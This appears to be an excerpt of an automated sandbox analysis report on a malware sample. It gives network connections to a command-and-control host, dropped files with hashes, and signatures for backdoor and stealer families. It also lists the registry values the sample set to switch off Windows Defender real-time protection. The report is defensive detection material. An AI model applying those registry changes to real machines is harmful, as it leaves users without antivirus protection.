| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
Files
memory/2884-0-0x00007FFC30773000-0x00007FFC30775000-memory.dmp
memory/2884-1-0x0000000000FC0000-0x000000000100E000-memory.dmp
memory/2884-2-0x00007FFC30770000-0x00007FFC31231000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zmjbhn5q.mt3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/856-12-0x00007FFC30770000-0x00007FFC31231000-memory.dmp
memory/856-13-0x00007FFC30770000-0x00007FFC31231000-memory.dmp
memory/856-14-0x00007FFC30770000-0x00007FFC31231000-memory.dmp
memory/856-15-0x0000022E2C5C0000-0x0000022E2C5E2000-memory.dmp
memory/856-18-0x00007FFC30770000-0x00007FFC31231000-memory.dmp
C:\Users\Admin\AppData\Roaming\x69.exe
| MD5 | 143b1a26c0fdda10f74ba1b6249e020a |
| SHA1 | 30a01b28f4f205bc594f8d6665963eaa49d172e3 |
| SHA256 | 83f2f88a1de9b022867ba3659074b0c349e24d2de7d0e01e136a325a5d5eed65 |
| SHA512 | 06fca2ea01ce1828ae7f08c17d7ae111d75ae5b4c0c01c618a02551300bf25c7ad17abcb078eb0a4082bf74a052fcd3f8f63122251cf5884ec97099f495a9ce0 |
memory/464-25-0x0000000000FE0000-0x0000000000FF8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | a43e653ffb5ab07940f4bdd9cc8fade4 |
| SHA1 | af43d04e3427f111b22dc891c5c7ee8a10ac4123 |
| SHA256 | c4c53abb13e99475aebfbe9fec7a8fead81c14c80d9dcc2b81375304f3a683fe |
| SHA512 | 62a97e95e1f19a8d4302847110dae44f469877eed6aa8ea22345c6eb25ee220e7d310fa0b7ec5df42356815421c0af7c46a0f1fee8933cc446641800eda6cd1b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | de5726e94ce7b4c3b1e45e1fe21335a8 |
| SHA1 | 0a9f73ff1d246b5f2f33529256fd0331bd3604b7 |
| SHA256 | fd897c8383327380c7c5cd1478072f08a37e338962f8e050638cef66cb619dea |
| SHA512 | 07a7b8748be25990dbabc854d3f9a0447b306809ee9bebe7c87a59bdde1a6cbc465c7274b53e6f04468bd2d77509459d04bc0193125fa02ad232c736131347dd |
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
| MD5 | 22d6b7ab5c8a05162d36d2981b715c28 |
| SHA1 | 7adc2e2c90b8dfcee0c34a86ad4d0cac79daf9f3 |
| SHA256 | f12428dc9c9f900d671d4135cfda52b7de9bfb6b34c5c336dbf88941db8575e1 |
| SHA512 | 374564a98cc8d663311cf27186aabf8b1e41f776c00f560c6d1d86758f7b6795b1b81651d414fa59af082e21c4e0fd1c475320e97f8e55942341a155c24138ce |
memory/1848-46-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
| MD5 | 56b2c3810dba2e939a8bb9fa36d3cf96 |
| SHA1 | 99ee31cd4b0d6a4b62779da36e0eeecdd80589fc |
| SHA256 | 4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07 |
| SHA512 | 27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e |
memory/4940-62-0x00000000001E0000-0x00000000001E9000-memory.dmp
memory/2884-61-0x00007FFC30773000-0x00007FFC30775000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8a712aac4f8e841cc0464b6bc58cfeef |
| SHA1 | 11b9a76b9d4fa3044475711bd2e1df3dca33c9ff |
| SHA256 | a2e81157d9054f70120f4aca077b1e76270f2709267b469180ad6cf7ff2b489c |
| SHA512 | d91c2fc2b433177bf652d4ca2ee017df5974e1c93d0e6dc7840f70b126a2e67f4a66a13464f9968b857945175d08c56587455fd77f2d590a97c463599aee0fac |
C:\Users\Admin\AppData\Local\Temp\5DAE508D.exe
| MD5 | 69691c7bdcc3ce6d5d8a1361f22d04ac |
| SHA1 | c63ae6dd4fc9f9dda66970e827d13f7c73fe841c |
| SHA256 | 08f271887ce94707da822d5263bae19d5519cb3614e0daedc4c7ce5dab7473f1 |
| SHA512 | 253405e03b91441a6dd354a9b72e040068b1bfe10e83eb1a64a086c05525d8ccae2bf09130c624af50d55c3522a4fbb7c18cfc8dd843e5f4801d9ad2b5164b12 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\PK71DMPF\k1[2].rar
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
C:\Users\Admin\AppData\Local\Temp\C15C.tmp\C15D.tmp\C15E.bat
| MD5 | 2df9441936169e60a9631bf730cd4273 |
| SHA1 | 979ee79524023a77b9577d077a3472b87fda9834 |
| SHA256 | 24ab289fe2d2dd6e86d9862bf5dac0f6c78acc444eb083152b3eaf84e041f95e |
| SHA512 | ab1e894b85c731e9ce84e0cabbab493935bec18e352bd397cf8b3172bb817e9b174069122180d1fc2d9e538864c1cd77fd5c18ce8dd2a45434c9c045f2bf39ee |
C:\Users\Admin\AppData\Roaming\x69install.exe
| MD5 | b89953da384c6a80b03e5b3abece33c9 |
| SHA1 | 8495ca680bc958f7b1c5525c2e92200fc9fa1864 |
| SHA256 | 5e515b4a674e11cb67492b05a96074b3c04c8171023d75301f61322837c53346 |
| SHA512 | 8466ada9ac155f358c99f3b14a7fd27e87dd73d017930f5870b817f214c1466f8d2dae9d121ef671e5771f0ea789397d554295da6403872017311b8c40c58963 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4f473e15a0686d0c819ad40b5f232368 |
| SHA1 | a769892ae2e8203e7d4a992a317189b56723da33 |
| SHA256 | 53d6c0d9a801d45fefdcec9b3ecf217fef683efc4e40ba9c72f0116ee4d20237 |
| SHA512 | d9b43132432078d5496688717253e58e7caab0dcbd20fc41fa8a718d11d699e93ee198f18be4243ed34bcf8912e1377888fe72ae5b26d920e765ab523f0bdf55 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0026cdd9bbc34b9de2447c0eb04c14b5 |
| SHA1 | ab7713fe5fbbb23031937dd1dc7d0fa238884ad4 |
| SHA256 | cf5a1c42641a83dd41fe89923591962b7ad189006342c7a67669239688f84a2d |
| SHA512 | 62aab723672e2731946f4bbf6a3d92609ff94384e324f3c50e803095529baf848ce2cd37219a059ced4c3f559e598bd9b900b9dd8aa0657adca6d845127797fe |
memory/2524-135-0x00000000009F0000-0x0000000000A21000-memory.dmp
memory/2956-136-0x00000000005F0000-0x00000000005F9000-memory.dmp
memory/2884-133-0x00007FFC30770000-0x00007FFC31231000-memory.dmp
memory/2884-138-0x00007FFC30770000-0x00007FFC31231000-memory.dmp
C:\Program Files\7-Zip\Uninstall.exe
| MD5 | ddd5265a64cedb9fc9dce8841678d3a7 |
| SHA1 | 942afa202bb0aacb4c5b9b774905519d2dabfde8 |
| SHA256 | 63644fe64dfdb3789bfe1dd60e44792d05bf030f7a7ad72b74f828527d29d396 |
| SHA512 | 3888f28110294610da3d63d66b0b53a3068d2b28af3edd86726dce8863ee71583ab498aa8f31c7653d5c97c238aeb0386cf63c8b1e1c717d4e3a11b3a9c9f4e9 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x69.exe.log
| MD5 | bb6a89a9355baba2918bb7c32eca1c94 |
| SHA1 | 976c76dfbc072e405ce0d0b9314fe5b9e84cb1b2 |
| SHA256 | 192fbb7f4d1396fd4846854c5472a60aa80932f3c754f2c2f1a2a136c8a6bb4b |
| SHA512 | efdf0c6228c3a8a7550804ac921dfefc5265eb2c9bbf4b8b00cedd427c0a5adf610586b844ff444bd717abff138affcbe49632ce984cbffc5fa8019b4ba6ec0f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 22310ad6749d8cc38284aa616efcd100 |
| SHA1 | 440ef4a0a53bfa7c83fe84326a1dff4326dcb515 |
| SHA256 | 55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf |
| SHA512 | 2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e2efbfd23e33d8d07d019bdd9ca20649 |
| SHA1 | 68d3b285c423d311bdf8dc53354f5f4000caf386 |
| SHA256 | f4386e3a103dafd6e85bebc2ad649069d168b4da8a0ded51b3ec96fa1408a828 |
| SHA512 | b7a961002557ff2efb785f756c9347e250392eab3dcb5168c67e89238e85368a41d0a5bdc94bfbbc192ba427c83e982234b3cf8824b166a69973f3f9df177443 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a7cc007980e419d553568a106210549a |
| SHA1 | c03099706b75071f36c3962fcc60a22f197711e0 |
| SHA256 | a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165 |
| SHA512 | b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fd35037a4bce53228fc0c6f658209cfc |
| SHA1 | 17ce97a410f34a30e577e438b6602431caf90bd9 |
| SHA256 | 62d002ca5023ddb8272ecc8c735590f778c1f59b2ebc6fb5448c86e0d3770089 |
| SHA512 | 86f318f8c09b0316c91cf814ecee6f54e9a11c99a1150cf2f8864548d97d2488ab4d8ec3d731856d212c7ca4237da7bcb30fed4e7e4a1a2aa5649863f9d44263 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dd1d0b083fedf44b482a028fb70b96e8 |
| SHA1 | dc9c027937c9f6d52268a1504cbae42a39c8d36a |
| SHA256 | cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c |
| SHA512 | 96bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9d20bed748fbb656980b0328d7b74728 |
| SHA1 | 5fc8910c493356c0968a86452cb7952917b954b4 |
| SHA256 | 172fe07653a93456e66d5b90333de53e23a561cf982a1a9d96c3459339009069 |
| SHA512 | eb1f0ca1042371a0d324ba520a9c4159fe91d34cf1851d829b1bf874b92f69fd08c540558d03f9a8c3286926c3c12d89ef9a70ac649c053a02f26922918054f1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 871daa0605e2bf4f8259c6ed08922818 |
| SHA1 | 8448225f10d502ce858e9f6818945bf7994d5963 |
| SHA256 | d0fe73c3319af4bb23a904483ac9af46406b0b559023809daac4ab4dba0fc3e7 |
| SHA512 | f97ce6108457836d2059d9ddf7272a811a3d332275f5bcc3887b18cb1b9a9e6f4359ca808302f13ef4245d4b39ac4636bd926f869cfa7851531457cf2db595ed |
memory/1848-305-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ba169f4dcbbf147fe78ef0061a95e83b |
| SHA1 | 92a571a6eef49fff666e0f62a3545bcd1cdcda67 |
| SHA256 | 5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1 |
| SHA512 | 8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 01fff31a70e26012f37789b179059e32 |
| SHA1 | 555b6f05cce7daf46920df1c01eb5c55dc62c9e6 |
| SHA256 | adf65afaf1c83572f05a99bf2ede8eb7be1aab0717d5254f501d5e09ba6f587b |
| SHA512 | ac310c9bc5c1effc45e1e425972b09d1f961af216b50e1a504caa046b7f1a5f3179760e0b29591d83756ecb686d17a24770cf06fcea57e6f287ca5bbf6b6971b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9c740b7699e2363ac4ecdf496520ca35 |
| SHA1 | aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9 |
| SHA256 | be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61 |
| SHA512 | 8885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af |
memory/2988-376-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c9b6705519e1eef08f86c4ba5f4286f3 |
| SHA1 | 6c6b179e452ecee2673a1d4fe128f1c06f70577f |
| SHA256 | 0f9cad44a79126871580e19b01dc3f880c5173b1faaf8b9018d5d1f829714705 |
| SHA512 | 6d8f85a7a8b0b124530f36a157cd0441b5c1eacdc35e274af9fbf0569d03d1d5e468651a5b2425f0215c282ecfa7b1ffeaeeaf18612822f00bd14306d30640c7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c1a54dd5a1ab44cc4c4afd42f291c863 |
| SHA1 | b77043ab3582680fc96192e9d333a6be0ae0f69d |
| SHA256 | c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75 |
| SHA512 | 010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 217d9191dfd67252cef23229676c9eda |
| SHA1 | 80d940b01c28e3933b9d68b3e567adc2bac1289f |
| SHA256 | e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133 |
| SHA512 | 86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bdc0c67993f3d7ee47cf0765eed8b315 |
| SHA1 | 613f67e1441b9be51fa0c0c80cde0ee583e9bab9 |
| SHA256 | 7619e5f3aff33b8f08cf21b316c7f7d31b5581c8fe2aed48aac0c78a875dc18e |
| SHA512 | f43af2065141e7a4ded5aac2492fa5f56488f16d21ea25d89ea08181f727a03bf613894036ef30643c23747141f8b01dec96a305d8737bfa416c47e9737f0df8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c6a597e8737d320d364521986803cb2c |
| SHA1 | 6b542167fa6674b4f69a1bdd58c6f2fee4c57d49 |
| SHA256 | 17107fc01623db2c028aa7e666e462b5dbbcaf7245329c3089080560607ea368 |
| SHA512 | c4bca8516a5272a15ae118bfbcb11db6d0666c6f48cd035b545c3df0e6436ffe20a1417e82ffc77ec430bc62157123bd9497ab9f621c82a6e2d32772ba7b7c87 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2ad33642f863ae14ee53bc6853ee330e |
| SHA1 | ca81cc7d8c33a46ebe97bc1d3db55e41a813029e |
| SHA256 | 17c7b3c895766071a0d87318ec4134a9032ed113b46d3ba75889819a61a9cc19 |
| SHA512 | 52c59a7bde3751e07da53f3942c15cc3e19a4bf1929fbc28ae568ed96531852747b4f724e01438e159c4c98bf2d846db205c48e32f4b5984e9fddeb936eb8aa9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1542328a8546914b4e2f1aef9cb42bea |
| SHA1 | 7a0ac5969dfb20eb974e8a3bd8707243fa68f94f |
| SHA256 | 7584152ef93be4dc497db509c723f20a1fd09d69df02d62c897eefda6bf4c737 |
| SHA512 | b2b117abc97a64a71538d57c7f6c68c405d7ff5ef91dafe768832ff63378cb627af8b035b2a803627754c2219dd26755a2fa28e3a1bb9b1deb32ba13487ee286 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a11402783a8686e08f8fa987dd07bca |
| SHA1 | 580df3865059f4e2d8be10644590317336d146ce |
| SHA256 | 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0 |
| SHA512 | 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510 |
memory/4940-568-0x00000000001E0000-0x00000000001E9000-memory.dmp
memory/1048-569-0x00000000001E0000-0x00000000001E9000-memory.dmp
memory/4192-570-0x00000281734C0000-0x00000281734EA000-memory.dmp
memory/4192-571-0x00007FFC4E790000-0x00007FFC4E985000-memory.dmp
memory/4192-572-0x00007FFC4D200000-0x00007FFC4D2BE000-memory.dmp
memory/6124-576-0x0000000140000000-0x0000000140008000-memory.dmp
memory/6124-575-0x0000000140000000-0x0000000140008000-memory.dmp
memory/6124-574-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4348-578-0x00007FFC4E790000-0x00007FFC4E985000-memory.dmp
memory/4348-579-0x00007FFC4D200000-0x00007FFC4D2BE000-memory.dmp
memory/6124-573-0x0000000140000000-0x0000000140008000-memory.dmp
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
memory/6124-588-0x0000000140000000-0x0000000140008000-memory.dmp
memory/6124-590-0x00007FFC4E790000-0x00007FFC4E985000-memory.dmp
memory/2636-592-0x00007FFC4E790000-0x00007FFC4E985000-memory.dmp
memory/2636-593-0x00007FFC4D200000-0x00007FFC4D2BE000-memory.dmp
memory/6124-591-0x00007FFC4D200000-0x00007FFC4D2BE000-memory.dmp
memory/672-617-0x00007FFC0E810000-0x00007FFC0E820000-memory.dmp
memory/316-632-0x000002152BB10000-0x000002152BB3C000-memory.dmp
memory/956-628-0x00007FFC0E810000-0x00007FFC0E820000-memory.dmp
memory/956-627-0x0000017611FB0000-0x0000017611FDC000-memory.dmp
memory/956-621-0x0000017611FB0000-0x0000017611FDC000-memory.dmp
memory/672-616-0x0000024A15AD0000-0x0000024A15AFC000-memory.dmp
memory/672-610-0x0000024A15AD0000-0x0000024A15AFC000-memory.dmp
memory/616-606-0x00007FFC0E810000-0x00007FFC0E820000-memory.dmp
memory/616-605-0x000002A1FA330000-0x000002A1FA35C000-memory.dmp
memory/616-599-0x000002A1FA330000-0x000002A1FA35C000-memory.dmp
memory/616-598-0x000002A1FA330000-0x000002A1FA35C000-memory.dmp
memory/616-597-0x000002A1FA300000-0x000002A1FA326000-memory.dmp
memory/2636-594-0x0000000140000000-0x0000000140008000-memory.dmp
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 1e8e2076314d54dd72e7ee09ff8a52ab |
| SHA1 | 5fd0a67671430f66237f483eef39ff599b892272 |
| SHA256 | 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f |
| SHA512 | 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 0b990e24f1e839462c0ac35fef1d119e |
| SHA1 | 9e17905f8f68f9ce0a2024d57b537aa8b39c6708 |
| SHA256 | a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a |
| SHA512 | c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | ceb7caa4e9c4b8d760dbf7e9e5ca44c5 |
| SHA1 | a3879621f9493414d497ea6d70fbf17e283d5c08 |
| SHA256 | 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9 |
| SHA512 | 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | 7d612892b20e70250dbd00d0cdd4f09b |
| SHA1 | 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5 |
| SHA256 | 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02 |
| SHA512 | f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | 8abf2d6067c6f3191a015f84aa9b6efe |
| SHA1 | 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7 |
| SHA256 | ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea |
| SHA512 | c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | f313c5b4f95605026428425586317353 |
| SHA1 | 06be66fa06e1cffc54459c38d3d258f46669d01a |
| SHA256 | 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b |
| SHA512 | b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890 |
Analysis: behavioral2
Detonation Overview
| Submitted | 2025-05-20 04:12 |
| Reported | 2025-05-20 04:26 |
| Platform | win10ltsc2021-20250425-en |
| Max time kernel | 870s |
| Max time network | 870s |
| Command Line | |
Signatures
Bdaejec
Bdaejec family
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Bdaejec Backdoor.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gurcu family
Gurcu, WhiteSnake
LatentBot
Latentbot family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
